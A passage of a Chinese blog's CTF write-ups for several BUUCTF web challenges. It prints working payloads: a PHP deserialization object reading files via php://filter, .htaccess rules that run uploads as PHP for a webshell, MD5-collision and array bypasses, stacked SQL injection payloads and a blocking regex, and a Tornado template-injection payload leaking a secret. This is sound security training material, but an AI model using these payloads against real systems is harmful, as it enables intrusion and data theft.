<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">process</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op == <span class="string">&quot;1&quot;</span>) &#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;write();</span><br><span class="line">	&#125; <span class="keyword">else</span> <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op == <span class="string">&quot;2&quot;</span>) &#123;</span><br><span class="line">        <span class="variable">$res</span> = <span class="keyword">$this</span>-&gt;read();</span><br><span class="line">		<span class="keyword">$this</span>-&gt;output(<span class="variable">$res</span>);</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;output(<span class="string">&quot;Bad Hacker!&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果op是1，进入write，如果是2的话进入output，这里两处都是若比较。</p>
<p>所以说只要领op&#x3D;2（整形），那么两处都可以绕过，（第一处绕过字符，第二如直接read）。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">read</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="variable">$res</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;filename)) &#123;</span><br><span class="line">        <span class="variable">$res</span> = file_get_contents(<span class="keyword">$this</span>-&gt;filename);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$res</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>filename可以控制，接着使用file_get_contents函数读文件，这里可以用php:&#x2F;&#x2F;filter伪协议读文件，然后输出。</p>
<p>但是还有一个问题，$op,$filename,$content这三个都是protected，protected权限的变量序列化的时候会有%00*%00字符，而%00的ASCII编码为0，不能绕过is_valid的检查。</p>
<p>绕过的话，php7.1+的版本对属性类型不敏感，本地序列化的时候可以使用public绕过。</p>
<p>（protected&#x2F;private类型的属性序列化后产生不可打印字符，public类型则不会。）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$op</span>=<span class="number">2</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$filename</span>=<span class="string">&#x27;php://filter/read=convert.base64-encode/resource=flag.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$content</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span>=<span class="keyword">new</span> FileHandler();</span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>总的来说这道题还是很有意思的，学到了很多。</p>
<h2 id="0x1C-MRCTF2020-你传你🐎呢"><a href="#0x1C-MRCTF2020-你传你🐎呢" class="headerlink" title="0x1C.[MRCTF2020]你传你🐎呢"></a>0x1C.[MRCTF2020]你传你🐎呢</h2><p>上传.htaccess，有几种写法：</p>
<blockquote>
<p>  SetHandler application&#x2F;x-httpd-php</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;bbb&quot;&gt;</span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br><span class="line">//其中bbb是要包含的文件，都会被当做php来执行</span><br></pre></td></tr></table></figure>

<blockquote>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php .png</span><br></pre></td></tr></table></figure>
</blockquote>
<p>大致就上面3种写法吧。</p>
<p>PS：当时一直连不上。。原来是htaccess写成了htacess</p>
<p>然后就社写马上传蚁剑连接就ok了。</p>
<h2 id="0x1D-MRCTF2020-Ez-bypass"><a href="#0x1D-MRCTF2020-Ez-bypass" class="headerlink" title="0x1D.[MRCTF2020]Ez_bypass"></a>0x1D.[MRCTF2020]Ez_bypass</h2><p>第一个绕过有两种绕法，之前的一个绕md5的题中也写了：</p>
<p>第一种：MD5碰撞</p>
<blockquote>
<p>  ?gg&#x3D;%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&amp;id&#x3D;%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2</p>
</blockquote>
<p>或者</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$s1 = &quot;%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab&quot;</span><br><span class="line">$s2 = &quot;%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%5f%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%f3%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%e9%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%13%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%a8%1b%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%39%05%39%95%ab&quot;</span><br><span class="line">$s3 = &quot;%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%16%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%33%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab&quot;</span><br><span class="line">以上3个的字符串都不相等，但是md5值相等。</span><br></pre></td></tr></table></figure>

<p>第二种，数组绕过：</p>
<blockquote>
<p>  ?gg[]&#x3D;1&amp;id[]&#x3D;1</p>
</blockquote>
<p>第二个绕过就是简单的在后面加字符就OK</p>
<blockquote>
<p>   passwd&#x3D;1234567a</p>
</blockquote>
<h2 id="0x1E-GYCTF2020-Blacklist"><a href="#0x1E-GYCTF2020-Blacklist" class="headerlink" title="0x1E.[GYCTF2020]Blacklist"></a>0x1E.[GYCTF2020]Blacklist</h2><p>有2个字段，但是union select 爆出说不能select，那么堆叠查询。</p>
<p>show databases;show tables ;show columns from ‘表名’；</p>
<p>一共有两个表，words，FlagHere</p>
<p>绕过技巧有3个：</p>
<p>1）修改表名</p>
<p>其中words：show columns from words 后是id和data</p>
<p>而Flag中只有一个flag。</p>
<p>推测是select id,data from words where id&#x3D;’$id$‘</p>
<p>那么：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.将words表名换成其他的名字</span><br><span class="line">2.将FlagHere换成words表名</span><br><span class="line">3.吧flag这个字段换成data</span><br><span class="line">4.再插入一个id字段</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;</span><br><span class="line">alter table words rename to words1;</span><br><span class="line">alter table `FlagHere` rename to words;</span><br><span class="line">alter table words change flag id varchar(50);#</span><br><span class="line"></span><br><span class="line">然后 1&#x27; or 1=1# 将flag打印出来</span><br></pre></td></tr></table></figure>

<p>2）预编译</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PREPARE name from &#x27;[my sql sequece]&#x27;;   //预定义SQL语句</span><br><span class="line">EXECUTE name;  //执行预定义SQL语句</span><br><span class="line">(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL语句</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SET @tn = &#x27;hahaha&#x27;;  //存储表名</span><br><span class="line">SET @sql = concat(&#x27;select * from &#x27;, @tn);  //存储SQL语句</span><br><span class="line">PREPARE name from @sql;   //预定义SQL语句</span><br><span class="line">EXECUTE name;  //执行预定义SQL语句</span><br><span class="line">(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句</span><br></pre></td></tr></table></figure>

<p>比如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;</span><br><span class="line">SeT@a=’select * from `FlagHere‘;</span><br><span class="line">prepare execsql from @a;</span><br><span class="line">execute execsql;#</span><br><span class="line">#可以使用16进制绕过</span><br></pre></td></tr></table></figure>

<p>3）Handler</p>
<p>但是以上方法在这题失效，因为：</p>
<blockquote>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return preg_match(&quot;/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i&quot;,$inject);</span><br></pre></td></tr></table></figure>
</blockquote>
<p>可以使用handler查看：</p>
<blockquote>
<p>  1’;</p>
<p>   handler FlagHere open;</p>
<p>  handler FlagHere read first;#</p>
</blockquote>
<h2 id="0x1F-护网杯-2018-easy-tornado"><a href="#0x1F-护网杯-2018-easy-tornado" class="headerlink" title="0x1F.[护网杯 2018]easy_tornado"></a>0x1F.[护网杯 2018]easy_tornado</h2><p>三个文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/flag.txt</span><br><span class="line">/welcome.txt</span><br><span class="line">/hints.txt</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/flag.txt</span><br><span class="line">flag in /fllllllllllllag</span><br><span class="line"></span><br><span class="line">/welcome.txt</span><br><span class="line">render</span><br><span class="line"></span><br><span class="line">/hints.txt</span><br><span class="line">md5(cookie_secret+md5(filename))</span><br></pre></td></tr></table></figure>

<p>在hints可以看到:</p>
<blockquote>
<p>   file?filename&#x3D;&#x2F;hints.txt&amp;filehash&#x3D;3c2c74f529451b2c58f5624ce640dfd5</p>
<p>  说明还需要filehash</p>
</blockquote>
<blockquote>
<p>  render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页 render配合Tornado使用</p>
<p>  根据之前打开文件的url参数分析这个就是filehash的值 想获得flag只要我们在url中传入&#x2F;fllllllllllllag文件和filehash 经过这段代码处理的值即可关键就在这cookie_secret这块,得想办法获得cookie_secret </p>
<p>  在tornado模板中，存在一些可以访问的快速对象,这里用到的是handler.settings，handler 指向RequestHandler，而RequestHandler.settings又指向self.application.settings，所以handler.settings就指向RequestHandler.application.settings了，这里面就是我们的一些环境变量</p>
<p>  通过模板注入方式我们可以构造</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">error?msg=&#123;&#123;handler.settings&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>得到:ab4a6b4a-f87f-449d-9016-1cd76c91c474</p>
<p>然后通过脚本获取hash</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line">cookie_secret = <span class="string">&#x27;ab4a6b4a-f87f-449d-9016-1cd76c91c474&#x27;</span></span><br><span class="line">filename = <span class="string">&#x27;/fllllllllllllag&#x27;</span></span><br><span class="line">file_hash = hashlib.md5(filename).hexdigest()</span><br><span class="line">new_filename = cookie_secret + file_hash</span><br><span class="line"><span class="built_in">print</span> hashlib.md5(new_filename).hexdigest()</span><br></pre></td></tr></table></figure>

<blockquote>
<p>  file?filename&#x3D;&#x2F;fllllllllllllag&amp;filehash&#x3D;add6c325a3930e0b3a30602d131fa9ea</p>
</blockquote>
<p>得到flag</p>

                                                                    </div>
                                                                    
                                                                        <div class="prev-or-next">
                                                                            <div class="post-foot-next">
                                                                                
                                                                                    <a href="/2021/04/17/BUU-WEB-0x1-0xF/" target="_self">
                                                                                        <i class="iconfont icon-chevronleft"></i>
                                                                                        <span>Prev</span>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                            <div class="post-attach">
                                                                                <!-- <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-05-03
            </span> -->

                                                                                
                                                                                            <span class="post-categories">
          <!-- <i class="iconfont icon-bookmark" title="Categories"></i> -->
          
          <!-- <span class="span--category">
            <a href="/categories/Technology/" title="Technology">
              <b>#</b> Technology
            </a>
          </span> -->
                                                                                            
                                                                                                </span>
                                                                                                
                                                                                    <span class="post-tags">
          <!-- <i class="iconfont icon-tags" title="Tags"></i> -->
          
          <!-- <span class="span--tag">
            <a href="/tags/WEB/" title="WEB">
              <b>#</b> WEB
            </a>
          </span> -->
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            </div>
                                                                            <div class="post-foot-prev">
                                                                                
                                                                                    <a href="/2021/06/01/BUU-PWN-0x10-0x1F/" target="_self">
                                                                                        <span>Next</span>
                                                                                        <i class="iconfont icon-chevronright"></i>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                        </div>
                                                                        
                                                                </div>
                                                                
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x10-ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Upload"><span class="toc-text">0x10.[ACTF2020 新生赛]Upload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x11-ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-BackupFile"><span class="toc-text">0x11.[ACTF2020 新生赛]BackupFile</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x12-HCTF-2018-admin"><span class="toc-text">0x12.[HCTF 2018]admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x13-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-BuyFlag"><span class="toc-text">0x13.[极客大挑战 2019]BuyFlag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x14-BJDCTF2020-Easy-MD5"><span class="toc-text">0x14.[BJDCTF2020]Easy MD5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x15-SUCTF-2019-CheckIn"><span class="toc-text">0x15.[SUCTF 2019]CheckIn</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x16-ZJCTF-2019-NiZhuanSiWei"><span class="toc-text">0x16.[ZJCTF 2019]NiZhuanSiWei</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x17-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-HardSQL"><span class="toc-text">0x17.[极客大挑战 2019]HardSQL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x18-CISCN2019-%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA-Day2-Web1-Hack-World"><span class="toc-text">0x18.[CISCN2019 华北赛区 Day2 Web1]Hack World</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x19-%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Fakebook"><span class="toc-text">0x19.[网鼎杯 2018]Fakebook</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1A-GXYCTF2019-BabySQli"><span class="toc-text">0x1A.[GXYCTF2019]BabySQli</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1B-%E7%BD%91%E9%BC%8E%E6%9D%AF-2020-%E9%9D%92%E9%BE%99%E7%BB%84-AreUSerialz"><span class="toc-text">0x1B.[网鼎杯 2020 青龙组]AreUSerialz</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1C-MRCTF2020-%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2"><span class="toc-text">0x1C.[MRCTF2020]你传你🐎呢</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1D-MRCTF2020-Ez-bypass"><span class="toc-text">0x1D.[MRCTF2020]Ez_bypass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1E-GYCTF2020-Blacklist"><span class="toc-text">0x1E.[GYCTF2020]Blacklist</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1F-%E6%8A%A4%E7%BD%91%E6%9D%AF-2018-easy-tornado"><span class="toc-text">0x1F.[护网杯 2018]easy_tornado</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




                                                                    
                                                                        <div class="comments-container">
                                                                            







                                                                        </div>
                                                                        
                                                            </div>
                                                            
        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Ghostasky">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" target="_blank" rel="noopener" href="https://twitter.com/ghostasky">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Ghostasky">怕什么真理无穷，进一寸有进一寸的欢喜。</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
